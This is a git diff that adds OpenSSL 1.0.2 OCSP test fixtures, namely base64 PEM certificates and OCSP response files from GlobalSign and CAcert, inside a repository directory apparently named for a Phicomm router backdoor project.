+8cvmO5ZND8YG1ViwN162WFm9ivSoWBzvWDbU2JhQFb+XzrzCcdn0YbNiTxJh/vYm
+uDuxto00dpBgujSOAQv8B90iDEJ+sZpYRzDRj62qStRey0zpq5eX+pA+gdppMUFb
+4QvJf0El8TbLCWLN4TjrFe6ju7ZaN9zmgVYGQ2fMHKIGNScLuIA950nYwzRkIfHa
+YW6HqP1rCR1EiYmstEeCQyDxJx+RUlh+q8L1BKzaMYhS6s63MZzQuGseYStaCmbC
+fBIRKjnK621vAWvc7UR+0hqnZ+U=
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D2_Cert_ICA.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D2_Cert_ICA.pem
new file mode 100644
index 0000000..459f98e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D2_Cert_ICA.pem
@@ -0,0 +1,26 @@
+-----BEGIN CERTIFICATE-----
+MIIEdzCCA1+gAwIBAgILBAAAAAABL07hRxAwDQYJKoZIhvcNAQEFBQAwVzELMAkG
+A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv
+b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw0wNjEyMTUwODAw
+MDBaFw0yODAxMjgxMjAwMDBaMEwxIDAeBgNVBAsTF0dsb2JhbFNpZ24gUm9vdCBD
+QSAtIFIyMRMwEQYDVQQKEwpHbG9iYWxTaWduMRMwEQYDVQQDEwpHbG9iYWxTaWdu
+MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAps8kDr4ubyiZRULEqz4h
+VJsL03+EcPoSs8u/h1/Gf4bTsjBc1v2t8Xvc5fhglgmSEPXQU977e35ziKxSiHtK
+pspJpl6op4xaEbx6guu+jOmzrJYlB5dKmSoHL7Qed7+KD7UCfBuWuMW5Oiy81hK5
+61l94tAGhl9eSWq1OV6INOy8eAwImIRsqM1LtKB9DHlN8LgtyyHK1WxbfeGgKYSh
++dOUScskYpEgvN0L1dnM+eonCitzkcadG6zIy+jgoPQvkItN+7A2G/YZeoXgbfJh
+E4hcn+CTClGXilrOr6vV96oJqmC93Nlf33KpYBNeAAHJSvo/pOoHAyECjoLKA8Kb
+jwIDAQABo4IBTTCCAUkwDgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8w
+HQYDVR0OBBYEFJviB1dnHB7AagbeWbSaLd/cGYYuMEcGA1UdIARAMD4wPAYEVR0g
+ADA0MDIGCCsGAQUFBwIBFiZodHRwczovL3d3dy5nbG9iYWxzaWduLmNvbS9yZXBv
+c2l0b3J5LzAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdsb2JhbHNpZ24u
+bmV0L3Jvb3QuY3JsMD0GCCsGAQUFBwEBBDEwLzAtBggrBgEFBQcwAYYhaHR0cDov
+L29jc3AuZ2xvYmFsc2lnbi5jb20vcm9vdHIxMCkGA1UdJQQiMCAGCCsGAQUFBwMB
+BggrBgEFBQcDAgYKKwYBBAGCNwoDAzAfBgNVHSMEGDAWgBRge2YaRQ2XyolQL30E
+zTSo//z9SzANBgkqhkiG9w0BAQUFAAOCAQEAOg/NJk04MAioxvxc2Ah67/ocKgPO
+Mq5EluFSA5UKUtZnr1uWfN0ZizBbNjprbqAVxoKhyzlmAFeLAqJuhfusVVq4FVAa
+kN4JSOyo9lccGDG9xn3IvevCpzlRbaL/HHjeHCcE4c8klegO5NUfsPn7UMrLbp5i
+JniG9cT1eI/dcq9uLtWe3c48y7jHLVRg1+WcAkuGRPBXUSvNCps8sfU6TB2KxfAw
+PmWHxA5fbkqsiqge5/rkM4AVhFZlJZv7njCIy5EWwQXDqSTsIdLVsPy3I0annff3
+xlMSeDe0E3OPN5deBJv5mYuTPiZCl5/9HrXVy4hINKJmoPqsco/dRy+CdA==
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D2_Issuer_Root.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D2_Issuer_Root.pem
new file mode 100644
index 0000000..f4ce4ca
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D2_Issuer_Root.pem
@@ -0,0 +1,21 @@
+-----BEGIN CERTIFICATE-----
+MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG
+A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv
+b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw
+MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i
+YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT
+aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ
+jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp
+xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz8kHp
+1Wrjsok6Vjk4bwY8iGlbKk3Fp1S4bInMm/k8yuX9ifUSPJJ4ltbcdG6TRGHRjcdG
+snUOhugZitVtbNV4FpWi6cgKOOvyJBNPc1STE4U6G7weNLWLBYy5d4ux2x8gkasJ
+U26Qzns3dLlwR5EiUWMWea6xrkEmCMgZK9FGqkjWZCrXgzT/LCrBbBlDSgeF59N8
+9iFo7+ryUp9/k5DPAgMBAAGjQjBAMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMBAf8E
+BTADAQH/MB0GA1UdDgQWBBRge2YaRQ2XyolQL30EzTSo//z9SzANBgkqhkiG9w0B
+AQUFAAOCAQEA1nPnfE920I2/7LqivjTFKDK1fPxsnCwrvQmeU79rXqoRSLblCKOz
+yj1hTdNGCbM+w6DjY1Ub8rrvrTnhQ7k4o+YviiY776BQVvnGCv04zcQLcFGUl5gE
+38NflNUVyRRBnMRddWQVDf9VMOyGj/8N7yy5Y0b2qvzfvGn9LhJIZJrglfCm7ymP
+AbEVtQwdpf5pLGkkeB6zpxxxYu7KyJesF12KwvhHhm4qxFYxldBniYUr+WymXUad
+DKqC5JlR3XC321Y9YeRq4VzW9v493kHMB65jUr9TU/Qr6cf9tveCX4XSQRjbgbME
+HMUfpIBvFSDJ3gyICh3WZlXi/EjJKSZp4A==
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D3.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D3.ors
new file mode 100644
index 0000000..d66439b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D3.ors
@@ -0,0 +1,38 @@
+MIIG8AoBAKCCBukwggblBgkrBgEFBQcwAQEEggbWMIIG0jCB+aF+MHwxCzAJBgNV
+BAYTAkFVMQwwCgYDVQQIEwNOU1cxDzANBgNVBAcTBlN5ZG5leTEUMBIGA1UEChML
+Q0FjZXJ0IEluYy4xHjAcBgNVBAsTFVNlcnZlciBBZG1pbmlzdHJhdGlvbjEYMBYG
+A1UEAxMPb2NzcC5jYWNlcnQub3JnGA8yMDEyMTAyMzEwMzkzMFowZjBkMDwwCQYF
+Kw4DAhoFAAQUi6TJyxcpGUU+u45zCZG5JfKDImUEFBa1MhvUx/Pg5o7zvdKwOu6y
+ORjRAgMLs8aAABgPMjAxMjEwMjMwOTU5MTJaoBEYDzIwMTIxMDI1MTAzOTMwWjAN
+BgkqhkiG9w0BAQUFAAOCAQEAYaaAzW26JQGFRyawj9ROtnSdJ9QPJ6B/wfpJif8e
+QU9lmKx0zIDdTum3Mc5tfxML71W025UW9jzowAfQ5bZbqa4nwZlWX5Py3hKebeYo
+WiND4pvhS4BRkheSkycEok0bj1FJYWYiJVpnTqKAPnOKrlL4qvGC2IOHk2toS/Je
+iLyoUwxrPtqaXt4Caoa3I70HE3H1QqvPIGIY6V4bxV7Km/xv99QOutkbfANGiNsx
+W7EDB3TRNhldzMnjEwG58X5Pe3xwEVqjCiBL+wQ8JALn08bJzFn9E04aYrqCGc8s
+gw1dgaBoZt+0vbQUN71KEocwMj5mzJqottOyqNwo7FZnBaCCBL4wggS6MIIEtjCC
+Ap6gAwIBAgIDCpvzMA0GCSqGSIb3DQEBBQUAMHkxEDAOBgNVBAoTB1Jvb3QgQ0Ex
+HjAcBgNVBAsTFWh0dHA6Ly93d3cuY2FjZXJ0Lm9yZzEiMCAGA1UEAxMZQ0EgQ2Vy
+dCBTaWduaW5nIEF1dGhvcml0eTEhMB8GCSqGSIb3DQEJARYSc3VwcG9ydEBjYWNl
+cnQub3JnMB4XDTExMDgyMzAwMDI1NloXDTEzMDgyMjAwMDI1NlowfDELMAkGA1UE
+BhMCQVUxDDAKBgNVBAgTA05TVzEPMA0GA1UEBxMGU3lkbmV5MRQwEgYDVQQKEwtD
+QWNlcnQgSW5jLjEeMBwGA1UECxMVU2VydmVyIEFkbWluaXN0cmF0aW9uMRgwFgYD
+VQQDEw9vY3NwLmNhY2VydC5vcmcwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
+AoIBAQCcxtRv5CPHw3BLdR/k/K72YsRgodbP+UdAONmvBvWzhwm6B8h6O+M64sFr
+2w6be7SYBECIyOQgNJ1flK4MoAWhdBA/H5NtxaDOKbAqA27tO9GaevcPp7c518O0
+3hVnlPLvsN1f48nY0jQOXUTfv5nYXmD0OSSK/V3IRo0KsWB6T9UnMGCeEwb4Oqqz
+uzM0b4SBflzMEony/m6Tg/qL7qs2TLZAqe77+BZaVdFkDUnaBN7RyMruXySxeXiz
+mogT3WhROeloMa/X+E01bWBYBEK7VZIY9pgBpXQ7vDbbIGgYuIXUi20wh03WMy16
+VDYdV0IUXHpidNUeK9W/BPP/7APBAgMBAAGjRDBCMAwGA1UdEwEB/wQCMAAwJwYD
+VR0lBCAwHgYIKwYBBQUHAwIGCCsGAQUFBwMBBggrBgEFBQcDCTAJBgNVHREEAjAA
+MA0GCSqGSIb3DQEBBQUAA4ICAQAoT6p5f3cGprAcgrnzdenfTmDe9LCW7k2VnazA
+MAzpsD6gXcSlo4+3hoHem/SpKRH2tqi34DmImCiv/S6fxsKM4Gfn5rlkAFviuTvS
+r5Zrwh4ZKSfaoWv4bmbzmcAxvuxdMWHf/5PbjegjzFTbBMekVPZY/abYtD6kdHQZ
+VNgzwZVfTBfYhfa+Rg72I2zjKpMsjxMqWfTmUzW6wfK6LFudZqu0U1NnJw+IlnVU
+6WtjL885ebQrmcRqWz3nMhVLIu5L3w/s+VTLvm7If6jcMDNUjz8s2BPcJeCXg3TE
+STsyl6tvk17RRz2+9JskxVOk11xIn96xR4FCERIid2ek9z1xi7oYOajQF50i/9Gj
+ReDEfRSyb4/LzoKDOY+h4Q6jryeHh7WIHFiK5qrBN2y8qOoRJ/OqQnqci/BJBNpe
+g9Q9PJRgGSzRndTXNHiYRbeLpq7eGo3sPqlR9qBQ3rd98XGOU0RCMnzjKhENC3qo
+5PkSF2xs8RmjWktFSTDwjYo0qf1teo7CGHjgaPjQ7JE8Q4ysFOQndSWmLpqwDcI9
+HfIvPwUIWArQrJRh9LCNSyvHVgLqY9kw8NW4TlMxV2WqaYCkiKi3XVRrSFR3ahS1
+VBvRZ8KpplrV7rhXjVSSqqfLk1sX3l72Ck2F9ON+qbNFmvhgNjSiBY9neMgo804a
+wG/pag==
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D3_Cert_EE.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D3_Cert_EE.pem
new file mode 100644
index 0000000..f371ed1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D3_Cert_EE.pem
@@ -0,0 +1,31 @@
+-----BEGIN CERTIFICATE-----
+MIIFZDCCA0ygAwIBAgIDC7PGMA0GCSqGSIb3DQEBBQUAMHkxEDAOBgNVBAoTB1Jv
+b3QgQ0ExHjAcBgNVBAsTFWh0dHA6Ly93d3cuY2FjZXJ0Lm9yZzEiMCAGA1UEAxMZ
+Q0EgQ2VydCBTaWduaW5nIEF1dGhvcml0eTEhMB8GCSqGSIb3DQEJARYSc3VwcG9y
+dEBjYWNlcnQub3JnMB4XDTEyMDUwNjE4NDY0MVoXDTE0MDUwNjE4NDY0MVowWzEL
+MAkGA1UEBhMCQVUxDDAKBgNVBAgTA05TVzEPMA0GA1UEBxMGU3lkbmV5MRQwEgYD
+VQQKEwtDQWNlcnQgSW5jLjEXMBUGA1UEAxMOd3d3LmNhY2VydC5vcmcwggEiMA0G
+CSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDeNSAxSFtymeN6rQD69eXIJEnCCP7Z
+24/fdOgxRDSBhfQDUVhdmsuDOvuziOoWGqRxZPcWdMEMRcJ5SrA2aHIstvnaLhUl
+xp2fuaeXx9XMCJ9ZmzHZbH4wqLaU+UlhcSsdkPzapf3N3HaUAW8kT4bHEGzObYVC
+UBxxhpY01EoGRQmnFojzLNF3+0O1npQzXg5MeIWHW/Z+9jE+6odL6IXgg1bvrP4d
+FgoveTcG6BmJu+50RwHaUad7hQuNeS+pNsVzCiDdMF2qoCQXtAGhnEQ9/KHpBD2z
+ISBVIyEbYxdyU/WxnkaOof63Mf/TAgMNzVN9duqEtFyvvMrQY1XkBBwfAgMBAAGj
+ggERMIIBDTAMBgNVHRMBAf8EAjAAMDQGA1UdJQQtMCsGCCsGAQUFBwMCBggrBgEF
+BQcDAQYJYIZIAYb4QgQBBgorBgEEAYI3CgMDMAsGA1UdDwQEAwIFoDAzBggrBgEF
+BQcBAQQnMCUwIwYIKwYBBQUHMAGGF2h0dHA6Ly9vY3NwLmNhY2VydC5vcmcvMIGE
+BgNVHREEfTB7gg53d3cuY2FjZXJ0Lm9yZ4IRc2VjdXJlLmNhY2VydC5vcmeCEnd3
+d21haWwuY2FjZXJ0Lm9yZ4IKY2FjZXJ0Lm9yZ4IOd3d3LmNhY2VydC5uZXSCCmNh
+Y2VydC5uZXSCDnd3dy5jYWNlcnQuY29tggpjYWNlcnQuY29tMA0GCSqGSIb3DQEB
+BQUAA4ICAQA2+uCGX18kZD8gyfj44TlwV4TXJ5BrT0M9qogg2k5u057i+X2ePy3D
+iE2REyLkU+i5ekH5gvTl74uSJKtpSf/hMyJEByyPyIULhlXCl46z2Z60drYzO4ig
+apCdkm0JthVGvk6/hjdaxgBGhUvSTEP5nLNkDa+uYVHJI58wfX2oh9gqxf8VnMJ8
+/A8Zi6mYCWUlFUobNd/ozyDZ6WVntrLib85sAFhds93nkoUYxgx1N9Xg/I31/jcL
+6bqmpRAZcbPtvEom0RyqPLM+AOgySWiYbg1Nl8nKx25C2AuXk63NN4CVwkXpdFF3                                                                                                               
+q5qk1izPruvJ68jNW0pG7nrMQsiY2BCesfGyEzY8vfrMjeR5MLNv5r+obeYFnC1j                                                                                                               
+uYp6JBt+thW+xPFzHYLjohKPwo/NbMOjIUM9gv/Pq3rVRPgWru4/8yYWhrmEK370                                                                                                               
+rtlYBUSGRUdR8xed1Jvs+4qJ3s9t41mLSXvUfwyPsT7eoloUAfw3RhdwOzXoC2P6                                                                                                               
+ftmniyu/b/HuYH1AWK+HFtFi9CHiMIqOJMhj/LnzL9udrQOpir7bVej/mlb3kSRo                                                                                                               
+2lZymKOvuMymMpJkvBvUU/QEbCxWZAkTyqL2qlcQhHv7W366DOFjxDqpthaTRD69                                                                                                               
+T8i/2AnsBDjYFxa47DisIvR57rLmE+fILjSvd94N/IpGs3lSOS5JeA==                                                                                                                       
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D3_Issuer_Root.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D3_Issuer_Root.pem
new file mode 100644
index 0000000..3ccc18e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D3_Issuer_Root.pem
@@ -0,0 +1,83 @@
+-----BEGIN CERTIFICATE-----
+MIIHPTCCBSWgAwIBAgIBADANBgkqhkiG9w0BAQQFADB5MRAwDgYDVQQKEwdSb290
+IENBMR4wHAYDVQQLExVodHRwOi8vd3d3LmNhY2VydC5vcmcxIjAgBgNVBAMTGUNB
+IENlcnQgU2lnbmluZyBBdXRob3JpdHkxITAfBgkqhkiG9w0BCQEWEnN1cHBvcnRA
+Y2FjZXJ0Lm9yZzAeFw0wMzAzMzAxMjI5NDlaFw0zMzAzMjkxMjI5NDlaMHkxEDAO
+BgNVBAoTB1Jvb3QgQ0ExHjAcBgNVBAsTFWh0dHA6Ly93d3cuY2FjZXJ0Lm9yZzEi
+MCAGA1UEAxMZQ0EgQ2VydCBTaWduaW5nIEF1dGhvcml0eTEhMB8GCSqGSIb3DQEJ
+ARYSc3VwcG9ydEBjYWNlcnQub3JnMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
+CgKCAgEAziLA4kZ97DYoB1CW8qAzQIxL8TtmPzHlawI229Z89vGIj053NgVBlfkJ
+8BLPRoZzYLdufujAWGSuzbCtRRcMY/pnCujW0r8+55jE8Ez64AO7NV1sId6eINm6
+zWYyN3L69wj1x81YyY7nDl7qPv4coRQKFWyGhFtkZip6qUtTefWIonvuLwphK42y
+fk1WpRPs6tqSnqxEQR5YYGUFZvjARL3LlPdCfgv3ZWiYUQXw8wWRBB0bF4LsyFe7
+w2t6iPGwcswlWyCR7BYCEo8y6RcYSNDHBS4CMEK4JZwFaz+qOqfrU0j36NK2B5jc
+G8Y0f3/JHIJ6BVgrCFvzOKKrF11myZjXnhCLotLddJr3cQxyYN/Nb5gznZY0dj4k
+epKwDpUeb+agRThHqtdB7Uq3EvbXG4OKDy7YCbZZ16oE/9KTfWgu3YtLq1i6L43q
+laegw1SJpfvbi1EinbLDvhG+LJGGi5Z4rSDTii8aP8bQUWWHIbEZAWV/RRyH9XzQ
+QUxPKZgh/TMfdQwEUfoZd9vUFBzugcMd9Zi3aQaRIt0AUMyBMawSB3s42mhb5ivU
+fslfrejrckzzAeVLIL+aplfKkQABi6F1ITe1Yw1nPkZPcCBnzsXWWdsC4PDSy826
+YreQQejdIOQpvGQpQsgi3Hia/0PsmBsJUUtaWsJx8cTLc6nloQsCAwEAAaOCAc4w
+ggHKMB0GA1UdDgQWBBQWtTIb1Mfz4OaO873SsDrusjkY0TCBowYDVR0jBIGbMIGY
+gBQWtTIb1Mfz4OaO873SsDrusjkY0aF9pHsweTEQMA4GA1UEChMHUm9vdCBDQTEe
+MBwGA1UECxMVaHR0cDovL3d3dy5jYWNlcnQub3JnMSIwIAYDVQQDExlDQSBDZXJ0
+IFNpZ25pbmcgQXV0aG9yaXR5MSEwHwYJKoZIhvcNAQkBFhJzdXBwb3J0QGNhY2Vy
+dC5vcmeCAQAwDwYDVR0TAQH/BAUwAwEB/zAyBgNVHR8EKzApMCegJaAjhiFodHRw
+czovL3d3dy5jYWNlcnQub3JnL3Jldm9rZS5jcmwwMAYJYIZIAYb4QgEEBCMWIWh0
+dHBzOi8vd3d3LmNhY2VydC5vcmcvcmV2b2tlLmNybDA0BglghkgBhvhCAQgEJxYl
+aHR0cDovL3d3dy5jYWNlcnQub3JnL2luZGV4LnBocD9pZD0xMDBWBglghkgBhvhC
+AQ0ESRZHVG8gZ2V0IHlvdXIgb3duIGNlcnRpZmljYXRlIGZvciBGUkVFIGhlYWQg
+b3ZlciB0byBodHRwOi8vd3d3LmNhY2VydC5vcmcwDQYJKoZIhvcNAQEEBQADggIB
+ACjH7pyCArpcgBLKNQodgW+JapnM8mgPf6fhjViVPr3yBsOQWqy1YPaZQwGjiHCc
+nWKdpIevZ1gNMDY75q1I08t0AoZxPuIrA2jxNGJARjtT6ij0rPtmlVOKTV39O9lg
+18p5aTuxZZKmxoGCXJzN600BiqXfEVWqFcofN8CCmHBh22p8lqOOLlQ+TyGpkO/c
+gr/c6EWtTZBzCDyUZbAEmXZ/4rzCahWqlwQ3JNgelE5tDlG+1sSPypZt90Pf6DBl
+Jzt7u0NDY8RD97LsaMzhGY4i+5jhe1o+ATc7iwiwovOVThrLm82asduycPAtStvY
+sONvRUgzEv/+PDIqVPfE94rwiCPCR/5kenHA0R6mY7AHfqQv0wGP3J8rtsYIqQ+T
+SCX8Ev2fQtzzxD72V7DX3WnRBnc0CkvSyqD/HMaMyRa+xMwyN2hzXwj7UfdJUzYF
+CpUCTPJ5GhD22Dp1nPMd8aINcGeGG7MW9S/lpOt5hvk9C8JzC6WZrG/8Z7jlLwum
+GCSNe9FINSkYQKyTYOGWhlC0elnYjyELn8+CkcY7v2vcB5G5l1YjqrZslMZIBjzk
+zk6q5PYvCdxTby78dOs6Y5nCpqyJvKeyRKANihDjbPIky/qbn3BHLt4Ui9SyIAmW
+omTxJBzcoTWcFbLUvFUufQb1nA5V9FrWk9p2rSVzTMVD
+-----END CERTIFICATE-----
+-----BEGIN CERTIFICATE-----
+MIIHWTCCBUGgAwIBAgIDCkGKMA0GCSqGSIb3DQEBCwUAMHkxEDAOBgNVBAoTB1Jv
+b3QgQ0ExHjAcBgNVBAsTFWh0dHA6Ly93d3cuY2FjZXJ0Lm9yZzEiMCAGA1UEAxMZ
+Q0EgQ2VydCBTaWduaW5nIEF1dGhvcml0eTEhMB8GCSqGSIb3DQEJARYSc3VwcG9y
+dEBjYWNlcnQub3JnMB4XDTExMDUyMzE3NDgwMloXDTIxMDUyMDE3NDgwMlowVDEU
+MBIGA1UEChMLQ0FjZXJ0IEluYy4xHjAcBgNVBAsTFWh0dHA6Ly93d3cuQ0FjZXJ0
+Lm9yZzEcMBoGA1UEAxMTQ0FjZXJ0IENsYXNzIDMgUm9vdDCCAiIwDQYJKoZIhvcN
+AQEBBQADggIPADCCAgoCggIBAKtJNRFIfNImflOUz0Op3SjXQiqL84d4GVh8D57a
+iX3h++tykA10oZZkq5+gJJlz2uJVdscXe/UErEa4w75/ZI0QbCTzYZzA8pD6Ueb1
+aQFjww9W4kpCz+JEjCUoqMV5CX1GuYrz6fM0KQhF5Byfy5QEHIGoFLOYZcRD7E6C
+jQnRvapbjZLQ7N6QxX8KwuPr5jFaXnQ+lzNZ6MMDPWAzv/fRb0fEze5ig1JuLgia
+pNkVGJGmhZJHsK5I6223IeyFGmhyNav/8BBdwPSUp2rVO5J+TJAFfpPBLIukjmJ0
+FXFuC3ED6q8VOJrU0gVyb4z5K+taciX5OUbjchs+BMNkJyIQKopPWKcDrb60LhPt
+XapI19V91Cp7XPpGBFDkzA5CW4zt2/LP/JaT4NsRNlRiNDiPDGCbO5dWOK3z0luL
+oFvqTpa4fNfVoIZwQNORKbeiPK31jLvPGpKK5DR7wNhsX+kKwsOnIJpa3yxdUly6
+R9Wb7yQocDggL9V/KcCyQQNokszgnMyXS0XvOhAKq3A6mJVwrTWx6oUrpByAITGp
+rmB6gCZIALgBwJNjVSKRPFbnr9s6JfOPMVTqJouBWfmh0VMRxXudA/Z0EeBtsSw/
+LIaRmXGapneLNGDRFLQsrJ2vjBDTn8Rq+G8T/HNZ92ZCdB6K4/jc0m+YnMtHmJVA
+BfvpAgMBAAGjggINMIICCTAdBgNVHQ4EFgQUdahxYEyIE/B42Yl3tW3Fid+8sXow
+gaMGA1UdIwSBmzCBmIAUFrUyG9TH8+DmjvO90rA67rI5GNGhfaR7MHkxEDAOBgNV
+BAoTB1Jvb3QgQ0ExHjAcBgNVBAsTFWh0dHA6Ly93d3cuY2FjZXJ0Lm9yZzEiMCAG
+A1UEAxMZQ0EgQ2VydCBTaWduaW5nIEF1dGhvcml0eTEhMB8GCSqGSIb3DQEJARYS
+c3VwcG9ydEBjYWNlcnQub3JnggEAMA8GA1UdEwEB/wQFMAMBAf8wXQYIKwYBBQUH
+AQEEUTBPMCMGCCsGAQUFBzABhhdodHRwOi8vb2NzcC5DQWNlcnQub3JnLzAoBggr
+BgEFBQcwAoYcaHR0cDovL3d3dy5DQWNlcnQub3JnL2NhLmNydDBKBgNVHSAEQzBB
+MD8GCCsGAQQBgZBKMDMwMQYIKwYBBQUHAgEWJWh0dHA6Ly93d3cuQ0FjZXJ0Lm9y
+Zy9pbmRleC5waHA/aWQ9MTAwNAYJYIZIAYb4QgEIBCcWJWh0dHA6Ly93d3cuQ0Fj
+ZXJ0Lm9yZy9pbmRleC5waHA/aWQ9MTAwUAYJYIZIAYb4QgENBEMWQVRvIGdldCB5
+b3VyIG93biBjZXJ0aWZpY2F0ZSBmb3IgRlJFRSwgZ28gdG8gaHR0cDovL3d3dy5D
+QWNlcnQub3JnMA0GCSqGSIb3DQEBCwUAA4ICAQApKIWuRKm5r6R5E/CooyuXYPNc
+7uMvwfbiZqARrjY3OnYVBFPqQvX56sAV2KaC2eRhrnILKVyQQ+hBsuF32wITRHhH
+Va9Y/MyY9kW50SD42CEH/m2qc9SzxgfpCYXMO/K2viwcJdVxjDm1Luq+GIG6sJO4
+D+Pm1yaMMVpyA4RS5qb1MyJFCsgLDYq4Nm+QCaGrvdfVTi5xotSu+qdUK+s1jVq3
+VIgv7nSf7UgWyg1I0JTTrKSi9iTfkuO960NAkW4cGI5WtIIS86mTn9S8nK2cde5a
+lxuV53QtHA+wLJef+6kzOXrnAzqSjiL2jA3k2X4Ndhj3AfnvlpaiVXPAPHG0HRpW
+Q7fDCo1y/OIQCQtBzoyUoPkD/XFzS4pXM+WOdH4VAQDmzEoc53+VGS3FpQyLu7Xt
+hbNc09+4ufLKxw0BFKxwWMWMjTPUnWajGlCVI/xI4AZDEtnNp4Y5LzZyo4AQ5OHz
+0ctbGsDkgJp8E3MGT9ujayQKurMcvEp4u+XjdTilSKeiHq921F73OIZWWonO1sOn
+ebJSoMbxhbQljPI/lrMQ2Y1sVzufb4Y6GIIiNsiwkTjbKqGTqoQ/9SdlrnPVyNXT
+d+pLncdBu8fA46A/5H2kjXPmEkvfoXNzczqA6NXLji/L6hOn1kGLrPo8idck9U60
+4GGSt/M3mMS+lqO3ig==
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISDOSC_D1.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISDOSC_D1.ors
new file mode 100644
index 0000000..66a60a2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISDOSC_D1.ors
@@ -0,0 +1,32 @@
+MIIFzwoBAKCCBcgwggXEBgkrBgEFBQcwAQEEggW1MIIFsTCBoKIWBBSpTXftIZX0
+lLT9zwVSQC5Jfp3pqhgPMjAxMjEwMTAxNDU0NDNaMHUwczBLMAkGBSsOAwIaBQAE
+FKByDqBqfGICVPKo9Z3Se6Tzty+kBBSwsEr9HHUo+BxhqhP2+sGQPWsWowISESG8
+vx4IzALnkqQG05AvM+2bgAAYDzIwMTIxMDEwMTMwMDAwWqARGA8yMDEyMTAxNzEz
+MDAwMFowCwYJKoZIhvcNAQEFA4IBAQBw5Z+0ggEddRTIq7cXlMoxG9Nrx4HtutsH
+itIUoZp/rlLoxHsJTo/VmdZvTTGIc7Ok9XuoH61lY/x9glAKsGRjz4Myc9+5rx0O
+675lwmOS+uaf3/hRkicVrVr7Pt2ug3R7OXm2MJrohjNKP8lqtLJ0hHP88a8rotKA
+r9uz/qHm7K4Uh7dRt/Pnu9MPG74tZeFNN4M1ONMEiRdG39FqzFDXWxwQ3NmyC0Wo
+DQn+NklZMknr8mm7IBWpzgU1fTD9R0yv0zdhUZGiEXxvdhm7GJrTET5jS30Ksm5j
+o+n39YVu/vGbjyyYx3+WdeQLEyipaGvldSuJpT+R684/RuFWNetcoIID+DCCA/Qw
+ggPwMIIC2KADAgECAhIRIcYjwu4UNkR1VGrDbSdFei8wDQYJKoZIhvcNAQEFBQAw
+WTELMAkGA1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExLzAtBgNV
+BAMTJkdsb2JhbFNpZ24gRXh0ZW5kZWQgVmFsaWRhdGlvbiBDQSAtIEcyMB4XDTEy
+MDkxOTA3NDAzMVoXDTEyMTIxOTA4NDAzMVowgYUxCzAJBgNVBAYTAkJFMRkwFwYD
+VQQKExBHbG9iYWxTaWduIG52LXNhMUIwQAYDVQQDEzlHbG9iYWxTaWduIEV4dGVu
+ZGVkIFZhbGlkYXRpb24gQ0EgLSBHMiBPQ1NQIHJlc3BvbmRlciAtIDExFzAVBgNV
+BAUTDjIwMTIwOTE5MDkzOTAwMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
+AQEAxkkb6QhDH3sEDj4zaysjVzYelq9lZ1cso4R2IyQxaoPaG6GkaCmHA4sz6KP+
+m3ADqplibEUBa/mzCxHW8/oy3NhGMFdbezduZrnRFLbzakOTeIo8VEIM3JPfgREv
